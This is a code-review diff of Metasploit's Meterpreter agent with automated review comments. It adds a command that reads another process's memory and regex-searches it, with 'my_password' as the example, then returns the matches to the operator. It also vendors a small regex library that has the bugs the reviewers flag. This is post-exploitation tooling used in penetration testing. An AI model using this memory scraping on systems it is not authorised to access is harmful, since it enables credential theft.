+ PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
+ BYTE Reserved6[128];
+ PVOID Reserved7[1];
+ ULONG SessionId;
+} PEB, * PPEB;
+
+typedef struct _PROCESS_BASIC_INFORMATION {
+ PVOID Reserved1;
+ PPEB PebBaseAddress;
+ PVOID Reserved2[2];
+ ULONG_PTR UniqueProcessId;
+ PVOID Reserved3;
+} PROCESS_BASIC_INFORMATION;
+typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION;
+
+typedef enum _PROCESSINFOCLASS {
+ ProcessBasicInformation = 0,
+ ProcessWow64Information = 26
+} PROCESSINFOCLASS;
 /*!
 * @brief Allocates memory in the context of the supplied process.
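Review bot: The hand-written `_UNICODE_STRING`, `_OBJECT_ATTRIBUTES`, `_RTL_USER_PROCESS_PARAMETERS`, `_PEB`, `_PROCESS_BASIC_INFORMATION`, `PPS_POST_PROCESS_INIT_ROUTINE` and `PROCESSINFOCLASS` definitions reuse the exact tag and typedef names of the public declarations in `winternl.h`, so this file will stop compiling with redefinition errors the moment that header is reached through precomp.h or any other include. `PPEB_LDR_DATA`, used for the `Ldr` member, and `NTSTATUS` are not declared in this hunk, so some header is already supplying them; it is worth confirming that header is not winternl.h and recording the decision above the block, e.g. `// Declared locally rather than via <winternl.h> so the layout is fixed; keep in sync with the SDK.` Several of the new types (`NTQUERYINFORMATIONPROCESS`, `OBJECT_ATTRIBUTES`, `PCUNICODE_STRING`, `MEMORY_INFORMATION_CLASS`) are not referenced by any new code visible here; if the rest of the change does not use them either, dropping them shrinks the surface that has to track SDK layout changes.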
@@ -339,3 +423,223 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet) return ERROR_SUCCESS; } + +BOOL can_read_memory(DWORD memory_protect) +{ + const int page_execute_read = 0x20; + const int page_execute_readwrite = 0x40; + const int page_readonly = 0x02; + const int page_readwrite = 0x04; + + return memory_protect == page_execute_read || + memory_protect == page_execute_readwrite || + memory_protect == page_readonly || + memory_protect == page_readwrite; +} + +typedef struct { + re_t compiled_regex[MAX_REGEXP_OBJECTS]; + unsigned char buffer[MAX_CHAR_CLASS_LEN]; // Used for character strings when "[]" is used. +} RegexNeedle; + +#define NEEDLES_MAX (size_t)5 +#define MEMORY_BUFFER_SIZE (size_t)(64 * 1024 * 1024) + +/// <summary> +/// Add the needle results to a packet. This automatically inserts each result into a new group. Returns ERROR_SUCCESS on success, or 1 on failure. +/// </summary> +/// <param name="packet">The packet to insert the needle group into</param> +/// <returns>ERROR_SUCCESS on success, else non-zero</returns> +NTSTATUS add_needle_results_to_packet(Packet* packet, const unsigned char* memory_buffer_ptr, size_t match_length, size_t match_address, size_t memory_base_address, size_t memory_region_size) +{ + if (packet == NULL || memory_buffer_ptr == NULL) { return ERROR_INVALID_PARAMETER; } + + dprintf("[MEM SEARCH] Creating results group"); + Packet* search_results = met_api->packet.create_group(); + if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); return ERROR_OUTOFMEMORY; } + + dprintf("[MEM SEARCH] Adding results to packet group"); + // Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash. 
+ met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, (LPVOID)memory_buffer_ptr, (DWORD)match_length + 1); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, memory_base_address); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, memory_region_size); + met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)match_length); + + met_api->packet.add_group(packet, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); + + return ERROR_SUCCESS; +} + +static HMODULE hKernel32 = NULL; +static HMODULE hNTDLL = NULL; + +static GETPROCADDRESS fGetProcAddress = NULL; +static OPENPROCESS fOpenProcess = NULL; +static CLOSEHANDLE fCloseHandle = NULL; +static VIRTUALQUERYEX fVirtualQueryEx = NULL; +static NTREADVIRTUALMEMORY fNtReadVirtualMemory = NULL; + +NTSTATUS setup_handles() +{ + if ((hKernel32 = GetModuleHandleA("kernel32.dll")) == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); return ERROR_INVALID_HANDLE; } + + if ((hNTDLL = GetModuleHandleA("ntdll.dll")) == NULL) { dprintf("[MEM SEARCH] Could not get ntdll.dll handle"); return ERROR_INVALID_HANDLE; } + + if ((fGetProcAddress = (GETPROCADDRESS)GetProcAddress(hKernel32, "GetProcAddress")) == NULL) { dprintf("[MEM SEARCH] Could not get GetProcAddress handle"); return ERROR_INVALID_ADDRESS; } + + if ((fVirtualQueryEx = (VIRTUALQUERYEX)fGetProcAddress(hKernel32, "VirtualQueryEx")) == NULL) { dprintf("[MEM SEARCH] Could not get VirtualQueryEx handle"); return ERROR_INVALID_ADDRESS; } + + if ((fOpenProcess = (OPENPROCESS)fGetProcAddress(hKernel32, "OpenProcess")) == NULL) { dprintf("[MEM SEARCH] Could not get OpenProcess handle"); return ERROR_INVALID_ADDRESS; } + + if ((fCloseHandle = (CLOSEHANDLE)fGetProcAddress(hKernel32, "CloseHandle")) == NULL) { dprintf("[MEM SEARCH] Could not get CloseHandle 
handle"); return ERROR_INVALID_ADDRESS; } + + if ((fNtReadVirtualMemory = (NTREADVIRTUALMEMORY)fGetProcAddress(hNTDLL, "NtReadVirtualMemory")) == NULL ) { dprintf("[MEM SEARCH] Could not get NtReadVirtualMemory handle"); return ERROR_INVALID_ADDRESS; } + + return ERROR_SUCCESS; +} + +/* + * Read through all of a process's virtual memory in the search for regular expression needles. + * + * req: TLV_TYPE_PID - The target process ID. + * req: TLV_TYPE_MEMORY_SEARCH_NEEDLE - The regular expression needle to search for. + * req: TLV_TYPE_UINT - The minimum length of a match. + * req: TLV_TYPE_MEMORY_SEARCH_MATCH_LEN - The maximum length of a match. + */ +DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) +{ + Packet* response = met_api->packet.create_response(packet); + DWORD result = ERROR_SUCCESS; + unsigned char* memory_buffer = NULL; + size_t needle_enum_index = 0; + HANDLE process_handle = NULL; + RegexNeedle regex_needles[NEEDLES_MAX] = { NULL }; + + dprintf("[MEM SEARCH] Getting PID"); + const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID); + if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; } + dprintf("[MEM SEARCH] Searching PID: %lu", pid); + + Tlv needle_tlv = { 0 }; + while (needle_enum_index < NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_tlv) == ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Compiling needle regex from TLV"); + const int result = re_compile(needle_tlv.buffer, needle_tlv.header.length - 1, (re_t)®ex_needles[needle_enum_index].compiled_regex, (unsigned char*)®ex_needles[needle_enum_index].buffer); + if (result != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Failed to setup compile needle regex from TLV packet"); + goto done; + } + + needle_enum_index++; + } + + dprintf("[MEM SEARCH] Getting Match Lengths"); + const size_t min_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_UINT); + const size_t 
max_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN); + if (min_match_length > max_match_length || max_match_length == 0) { dprintf("[MEM SEARCH] Incorrect min or max match lengths"); result = ERROR_INVALID_PARAMETER; goto done; } + const size_t current_max_match_length = max_match_length; + + dprintf("[MEM SEARCH] Getting handles & proc addresses"); + if ((result = setup_handles()) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Could not set up all necessary handles & proc addresses"); + goto done; + } + + const DWORD process_vm_read = 0x0010; + const DWORD process_query_information = 0x0400; + const DWORD wanted_process_perms = process_vm_read | process_query_information; + + dprintf("[MEM SEARCH] Opening process"); + process_handle = fOpenProcess(wanted_process_perms, FALSE, pid); + if (process_handle == NULL) { dprintf("[MEM SEARCH] Could not get process handle"); result = ERROR_INVALID_HANDLE; goto done; } + + MEMORY_BASIC_INFORMATION mem = { 0 }; + dprintf("[MEM SEARCH] Allocating buffer for storing process memory"); + memory_buffer = (unsigned char*)malloc(MEMORY_BUFFER_SIZE * sizeof(unsigned char)); + if (memory_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; } + + for (size_t current_ptr = 0; fVirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize) + { + if (!can_read_memory(mem.Protect)) { continue; } + + size_t memory_region_offset = 0; + // Note: This currently does not support regex'ing over multiple memory regions. + // e.g. + // regex = "my_password.*"; + // | ....my_pas | sword.... 
| + while (mem.RegionSize > memory_region_offset) + { + const size_t leftover_bytes = mem.RegionSize - memory_region_offset; + const size_t bytes_to_read = min(leftover_bytes, MEMORY_BUFFER_SIZE * sizeof(unsigned char)); + dprintf("[MEM SEARCH] Leftover Bytes count: %llu", leftover_bytes); + dprintf("[MEM SEARCH] Bytes to read: %llu", bytes_to_read); + size_t bytes_read = 0; + + const size_t read_address = (size_t)mem.BaseAddress + memory_region_offset; + // Note: This will read up to a maximum of bytes_to_read OR to the end of the memory region if the end of it has been reached. + if (fNtReadVirtualMemory(process_handle, (LPCVOID)read_address, memory_buffer, bytes_to_read, &bytes_read) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); + memory_region_offset += bytes_to_read; + continue; + } + + dprintf("[MEM SEARCH] Read %llu bytes", bytes_read); + // Note: Increment the offset so that we aren't stuck in an infinite loop, trying to read zero bytes from the same pointer. + if (bytes_read == 0) { dprintf("[MEM SEARCH] Read zero bytes from a readable memory region"); memory_region_offset += bytes_to_read; continue; } + + for (size_t current_needle_index = 0; current_needle_index < needle_enum_index; current_needle_index++) + { + size_t current_buffer_offset = 0; + size_t match_length = 0; + int match_result = -1; + + do + { + const unsigned char* current_buffer_ptr = memory_buffer + current_buffer_offset; + const size_t bytes_to_regex = bytes_read - current_buffer_offset; + + match_result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, current_max_match_length, &match_length); + + if (match_result != -1) + { + const size_t match_address = read_address + current_buffer_offset + match_result; + dprintf("[MEM SEARCH] -- ! FOUND A REGEX MATCH ! 
--"); + dprintf("[MEM SEARCH] Address: %p", match_address); + + if (match_length < min_match_length) + { + dprintf("[MEM SEARCH] Match length was too short, skipping."); + current_buffer_offset += (match_result + match_length); + continue; + } + + const unsigned char* memory_buffer_ptr = memory_buffer + current_buffer_offset + match_result; + if (add_needle_results_to_packet(response, memory_buffer_ptr, match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Adding search results to packet was not successful"); + } + + current_buffer_offset += (match_result + match_length); + } + } while (match_result != -1); + } + + memory_region_offset += bytes_to_read; + } + } + + result = ERROR_SUCCESS; + +done: + dprintf("[MEM SEARCH] Memory Search complete."); + if (memory_buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(memory_buffer); } + if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); fCloseHandle(process_handle); } + + dprintf("[MEM SEARCH] Transmitting response"); + met_api->packet.transmit_response(result, remote, response); + return ERROR_SUCCESS; +} diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h index da04b4d23..85ca089cf 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h @@ -46,6 +46,7 @@ DWORD request_sys_process_memory_query(Remote *remote, Packet *packet); DWORD request_sys_process_memory_protect(Remote *remote, Packet *packet); DWORD request_sys_process_memory_lock(Remote *remote, Packet *packet); DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet); +DWORD request_sys_process_memory_search(Remote *remote, Packet *packet); // Thread DWORD request_sys_process_thread_open(Remote *remote, Packet *packet); 
diff --git a/c/meterpreter/source/extensions/stdapi/stdapi.h b/c/meterpreter/source/extensions/stdapi/stdapi.h old mode 100755 new mode 100644 index 7ee5303a3..adc2b5b52 --- a/c/meterpreter/source/extensions/stdapi/stdapi.h +++ b/c/meterpreter/source/extensions/stdapi/stdapi.h @@ -98,6 +98,15 @@ #define TLV_TYPE_REGISTER_VALUE_32 MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2542 ) #define TLV_TYPE_REGISTER MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2550 ) +// Memory - Taken from Mettle: https://github.com/rapid7/mettle/blob/master/mettle/src/tlv_types.h#L262 +#define TLV_TYPE_MEMORY_SEARCH_NEEDLE MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2650 ) +#define TLV_TYPE_MEMORY_SEARCH_RESULTS MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2651 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2652 ) +#define TLV_TYPE_MEMORY_SEARCH_START_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2653 ) +#define TLV_TYPE_MEMORY_SEARCH_SECT_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2654 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2655 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_STR MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2656 ) + // Registry #define TLV_TYPE_HKEY MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 1000 ) #define TLV_TYPE_ROOT_KEY TLV_TYPE_HKEY diff --git a/c/meterpreter/source/extensions/winpmem/winpmem.cpp b/c/meterpreter/source/extensions/winpmem/winpmem.cpp old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/winpmem/winpmem.h b/c/meterpreter/source/extensions/winpmem/winpmem.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/metsrv/metsrv.h b/c/meterpreter/source/metsrv/metsrv.h index e73aaacd8..7013b66d5 100644 
--- a/c/meterpreter/source/metsrv/metsrv.h +++ b/c/meterpreter/source/metsrv/metsrv.h @@ -18,6 +18,10 @@ #include "remote_dispatch.h" #include "libloader.h" +#define EXITFUNC_SEH 0xEA320EFE +#define EXITFUNC_THREAD 0x0A2A1DE0 +#define EXITFUNC_PROCESS 0x56A2B5F0 + #include "../ReflectiveDLLInjection/inject/src/GetProcAddressR.h" #include "../ReflectiveDLLInjection/inject/src/LoadLibraryR.h" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.h" diff --git a/c/meterpreter/source/metsrv/server_pivot_named_pipe.c b/c/meterpreter/source/metsrv/server_pivot_named_pipe.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/tiny-regex-c/README.md b/c/meterpreter/source/tiny-regex-c/README.md new file mode 100644 index 000000000..a32fdb14e --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/README.md @@ -0,0 +1,3 @@ +# tiny-regex-c + +This library is taken from https://github.com/kokke/tiny-regex-c/tree/2d306a5a71128853d18292e8bb85c8e745fbc9d0 - with changes to support null-bytes. diff --git a/c/meterpreter/source/tiny-regex-c/re.c b/c/meterpreter/source/tiny-regex-c/re.c new file mode 100644 index 000000000..98eaf66cd --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/re.c 
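Review bot: The three `EXITFUNC_*` constants added to metsrv.h carry no comment saying what the values are or what they must stay in sync with; they look like the block-API function hashes Metasploit payloads use to select an exit technique, but nothing in the hunk says so. A one-line comment above the block, e.g. `// Exit-technique selectors; values must match the EXITFUNC hashes used by the framework's payload generator`, would tell a maintainer not to renumber them.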
@@ -0,0 +1,488 @@ +/* + * + * Mini regex-module inspired by Rob Pike's regex code described in: + * + * http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html + * + * + * + * Supports: + * --------- + * '.' Dot, matches any character + * '^' Start anchor, matches beginning of string + * '$' End anchor, matches end of string + * '*' Asterisk, match zero or more (greedy) + * '+' Plus, match one or more (greedy) + * '?' Question, match zero or one (non-greedy) + * '[abc]' Character class, match if one of {'a', 'b', 'c'} + * '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken! + * '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z } + * '\s' Whitespace, \t \f \r \n \v and spaces + * '\S' Non-whitespace + * '\w' Alphanumeric, [a-zA-Z0-9_] + * '\W' Non-alphanumeric + * '\d' Digits, [0-9] + * '\D' Non-digits + * + * + */ + + +#include "re.h" +#include <stdio.h> +#include <ctype.h> + +/* Definitions: */ + +enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR_RE, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ }; + +/* Private function declarations: */ +static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength); +static int matchcharclass(char c, const char* str); +static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength); +static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength); +static int matchone(regex_t p, char c); +static int matchdigit(char c); +static int matchalpha(char c); +static int matchwhitespace(char c); +static int matchmetachar(char c, const char* str); +static int matchrange(char c, const char* str); +static int matchdot(char c); +static 
int ismetachar(char c); + +/* Public functions: */ +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t max_match_length, size_t* matchlength) +{ + if (max_match_length == 0) { return -1; } + *matchlength = 0; + + if (pattern == 0 || text_length == 0) { return -1; } + + if (pattern[0].type == BEGIN) + { + return ((matchpattern(&pattern[1], text, text_length, 0, max_match_length, matchlength)) ? 0 : -1); + } + + int idx = -1; + + do + { + idx += 1; + + if (matchpattern(pattern, text, text_length, idx, max_match_length, matchlength)) + { + return idx; + } + } + while ((size_t)idx < text_length); + + return -1; +} + +int re_compile(const char* pattern, size_t pattern_length, re_t compiled_regex, unsigned char* regex_char_buffer) +{ + int ccl_bufidx = 1; + + char c; /* current char in pattern */ + int i = 0; /* index into pattern */ + int j = 0; /* index into re_compiled */ + + while (i < (int)pattern_length && (j + 1 < MAX_REGEXP_OBJECTS)) + { + c = pattern[i]; + + switch (c) + { + /* Meta-characters: */ + case '^': { compiled_regex[j].type = BEGIN; } break; + case '$': { compiled_regex[j].type = END; } break; + case '.': { compiled_regex[j].type = DOT; } break; + case '*': { compiled_regex[j].type = STAR; } break; + case '+': { compiled_regex[j].type = PLUS; } break; + case '?': { compiled_regex[j].type = QUESTIONMARK; } break; + /* case '|': { compiled_regex[j].type = BRANCH; } break; <-- not working properly */ + + /* Escaped character-classes (\s \w ...): */ + case '\\': + { + if (i + 1 < (int)pattern_length) + { + /* Skip the escape-char '\\' */ + i += 1; + /* ... 
and check the next */ + switch (pattern[i]) + { + /* Meta-character: */ + case 'd': { compiled_regex[j].type = DIGIT; } break; + case 'D': { compiled_regex[j].type = NOT_DIGIT; } break; + case 'w': { compiled_regex[j].type = ALPHA; } break; + case 'W': { compiled_regex[j].type = NOT_ALPHA; } break; + case 's': { compiled_regex[j].type = WHITESPACE; } break; + case 'S': { compiled_regex[j].type = NOT_WHITESPACE; } break; + + /* Escaped character, e.g. '.' or '$' */ + default: + { + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = pattern[i]; + } break; + } + } + else + { + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = pattern[i]; + } + } break; + + /* Character class: */ + case '[': + { + /* Remember where the char-buffer starts. */ + int buf_begin = ccl_bufidx; + + /* Look-ahead to determine if negated */ + if (pattern[i + 1] == '^') + { + compiled_regex[j].type = INV_CHAR_CLASS; + i += 1; /* Increment i to avoid including '^' in the char-buffer */ + if (i + 1 == (int)pattern_length) /* incomplete pattern, missing non-zero char after '^' */ + { + return 1; + } + } + else + { + compiled_regex[j].type = CHAR_CLASS; + } + + /* Copy characters inside [..] 
to buffer */ + while ((pattern[++i] != ']') + && (i < (int)pattern_length)) /* Missing ] */ + { + if (pattern[i] == '\\') + { + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN - 1) + { + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + if (i + 1 == (int)pattern_length) /* incomplete pattern, missing non-zero char after '\\' */ + { + return 1; + } + regex_char_buffer[ccl_bufidx++] = pattern[i++]; + } + else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + regex_char_buffer[ccl_bufidx++] = pattern[i]; + } + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + /* Catches cases such as [00000000000000000000000000000000000000][ */ + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + /* Null-terminate string end */ + regex_char_buffer[ccl_bufidx++] = 0; + compiled_regex[j].u.ccl = ®ex_char_buffer[buf_begin]; + } break; + + /* Other characters: */ + default: + { + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = c; + } break; + } + + i += 1; + j += 1; + } + /* 'UNUSED' is a sentinel used to indicate end-of-pattern */ + compiled_regex[j].type = UNUSED; + + return 0; // ERROR_SUCCESS +} + +void re_print(regex_t* pattern) +{ + const char* types[] = { "UNUSED", "DOT", "BEGIN", "END", "QUESTIONMARK", "STAR", "PLUS", "CHAR", "CHAR_CLASS", "INV_CHAR_CLASS", "DIGIT", "NOT_DIGIT", "ALPHA", "NOT_ALPHA", "WHITESPACE", "NOT_WHITESPACE", "BRANCH" }; + + int i; + int j; + char c; + for (i = 0; i < MAX_REGEXP_OBJECTS; ++i) + { + if (pattern[i].type == UNUSED) + { + break; + } + + printf("type: %s", types[pattern[i].type]); + if (pattern[i].type == CHAR_CLASS || pattern[i].type == INV_CHAR_CLASS) + { + printf(" ["); + for (j = 0; j < MAX_CHAR_CLASS_LEN; ++j) + { + c = pattern[i].u.ccl[j]; + if ((c == '\0') || (c == ']')) + { + break; + } + printf("%c", c); + } + printf("]"); + } + else if (pattern[i].type == CHAR_RE) + { + printf(" '%c'", pattern[i].u.ch); + } + printf("\n"); + } +} + + + +/* Private 
functions: */ +static int matchdigit(char c) +{ + return isdigit(c); +} +static int matchalpha(char c) +{ + return isalpha(c); +} +static int matchwhitespace(char c) +{ + return isspace(c); +} +static int matchalphanum(char c) +{ + return ((c == '_') || matchalpha(c) || matchdigit(c)); +} +static int matchrange(char c, const char* str) +{ + return ( (c != '-') + && (str[0] != '\0') + && (str[0] != '-') + && (str[1] == '-') + && (str[2] != '\0') + && ( (c >= str[0]) + && (c <= str[2]))); +} +static int matchdot(char c) +{ +#if defined(RE_DOT_MATCHES_NEWLINE) && (RE_DOT_MATCHES_NEWLINE == 1) + (void)c; + return 1; +#else + return c != '\n' && c != '\r'; +#endif +} +static int ismetachar(char c) +{ + return ((c == 's') || (c == 'S') || (c == 'w') || (c == 'W') || (c == 'd') || (c == 'D')); +} + +static int matchmetachar(char c, const char* str) +{ + switch (str[0]) + { + case 'd': return matchdigit(c); + case 'D': return !matchdigit(c); + case 'w': return matchalphanum(c); + case 'W': return !matchalphanum(c); + case 's': return matchwhitespace(c); + case 'S': return !matchwhitespace(c); + default: return (c == str[0]); + } +} + +static int matchcharclass(char c, const char* str) +{ + do + { + if (matchrange(c, str)) + { + return 1; + } + else if (str[0] == '\\') + { + /* Escape-char: increment str-ptr and match on next char */ + str += 1; + if (matchmetachar(c, str)) + { + return 1; + } + else if ((c == str[0]) && !ismetachar(c)) + { + return 1; + } + } + else if (c == str[0]) + { + if (c == '-') + { + return ((str[-1] == '\0') || (str[1] == '\0')); + } + else + { + return 1; + } + } + } + while (*str++ != '\0'); + + return 0; +} + +static int matchone(regex_t p, char c) +{ + switch (p.type) + { + case DOT: return matchdot(c); + case CHAR_CLASS: return matchcharclass(c, (const char*)p.u.ccl); + case INV_CHAR_CLASS: return !matchcharclass(c, (const char*)p.u.ccl); + case DIGIT: return matchdigit(c); + case NOT_DIGIT: return !matchdigit(c); + case ALPHA: return 
matchalphanum(c); + case NOT_ALPHA: return !matchalphanum(c); + case WHITESPACE: return matchwhitespace(c); + case NOT_WHITESPACE: return !matchwhitespace(c); + default: return (p.u.ch == c); + } +} + +static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) +{ + size_t prelen = *matchlength; + const char* prepoint = text; + while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset])) + { + text_offset++; + (*matchlength)++; + } + while (&text[text_offset] >= prepoint) + { + if (matchpattern(pattern, text, text_length, text_offset--, max_match_length, matchlength)) + return 1; + (*matchlength)--; + } + + *matchlength = prelen; + return 0; +} + +static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) +{ + const char* prepoint = text; + while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset])) + { + text_offset++; + (*matchlength)++; + } + while (text > prepoint) + { + if (matchpattern(pattern, text, text_length, text_offset--, max_match_length, matchlength)) + return 1; + (*matchlength)--; + } + + return 0; +} + +static int matchquestion(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) +{ + if (p.type == UNUSED) + return 1; + if (matchpattern(pattern, text, text_length, text_offset, max_match_length, matchlength)) + return 1; + if ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset++])) + { + if (matchpattern(pattern, text, text_length, text_offset, max_match_length, matchlength)) + { + (*matchlength)++; + return 1; + } + } + return 0; +} + + +#if 0 + +/* Recursive matching */ +static int matchpattern(regex_t* pattern, const char* text, int *matchlength) 
+{ + int pre = *matchlength; + if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK)) + { + return matchquestion(pattern[1], &pattern[2], text, matchlength); + } + else if (pattern[1].type == STAR) + { + return matchstar(pattern[0], &pattern[2], text, matchlength); + } + else if (pattern[1].type == PLUS) + { + return matchplus(pattern[0], &pattern[2], text, matchlength); + } + else if ((pattern[0].type == END) && pattern[1].type == UNUSED) + { + return text[0] == '\0'; + } + else if ((text[0] != '\0') && matchone(pattern[0], text[0])) + { + (*matchlength)++; + return matchpattern(&pattern[1], text+1); + } + else + { + *matchlength = pre; + return 0; + } +} + +#else + +/* Iterative matching */ +static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) +{ + size_t pre = *matchlength; + do + { + if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK)) + { + return matchquestion(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength); + } + else if (pattern[1].type == STAR) + { + return matchstar(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength); + } + else if (pattern[1].type == PLUS) + { + return matchplus(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength); + } + else if ((pattern[0].type == END) && pattern[1].type == UNUSED) + { + return (text_offset == text_length - 1); + } +/* Branching is not working properly + else if (pattern[1].type == BRANCH) + { + return (matchpattern(pattern, text) || matchpattern(&pattern[2], text)); + } +*/ + (*matchlength)++; + } + while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(*pattern++, text[text_offset++])); + + *matchlength = pre; + return 0; +} + +#endif 
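Review bot: `matchplus` can never succeed: `prepoint` is set to `text` and only `text_offset` advances, so `while (text > prepoint)` is false on entry, the rest of the pattern is never tried, and every needle containing `+` fails to match. `matchstar` has the mirror-image problem — `while (&text[text_offset] >= prepoint)` only stops after `text_offset--` wraps `size_t` and forms a pointer before `text`, which is undefined behaviour even though it happens to terminate; both loops should track the start offset instead, as below. `matchdigit`, `matchalpha` and `matchwhitespace` pass a plain `char` to the `<ctype.h>` functions, and because the caller feeds raw process memory, bytes above 0x7F arrive as negative values those functions do not accept — use `isdigit((unsigned char)c)` and likewise for the other two. In `re_compile`, the class parser evaluates `pattern[++i]` before checking `i < (int)pattern_length`, and the `^` look-ahead reads `pattern[i + 1]` without a bound, so a needle ending in `[` is read one byte past its length; test the bound first, `while (++i < (int)pattern_length && pattern[i] != ']')`, and guard the look-ahead with `i + 1 < (int)pattern_length`.
```c
static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength)
{
    size_t prelen = *matchlength;
    const size_t start = text_offset;
    /* … unchanged: greedy consumption loop … */
    for (;;)
    {
        if (matchpattern(pattern, text, text_length, text_offset, max_match_length, matchlength))
            return 1;
        (*matchlength)--;
        if (text_offset == start)
            break;
        text_offset--;
    }

    *matchlength = prelen;
    return 0;
}

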